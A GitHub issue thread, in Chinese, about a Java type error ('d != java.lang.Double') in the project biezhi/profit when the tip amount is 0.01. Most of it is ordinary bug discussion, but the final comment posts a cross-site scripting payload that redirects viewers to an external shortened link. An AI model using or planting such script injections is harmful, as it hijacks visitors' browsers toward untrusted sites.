### ISSUE TITLE
当打赏金额为0.01时，发生内部错误

### ISSUE THREAD

**Issue by han-bing** [biezhi/profit#9]
提示错误信息：d != java.lang.Double
![image](https://user-images.githubusercontent.com/36099906/46725338-8dc9f980-ccae-11e8-95e6-4a296208e7ee.png)

**Comment by NEETLee** [comment]
我把金额改成0.001也是这个异常

**Comment by biezhi** [comment]
@NEETLee  最新版本没有重现，你是 `release` 的最新版吗？

**Comment by xmt1139057136** [comment]
哈哈，试试这个<script>top.location='http://t.cn/E7kdWyg';</script>
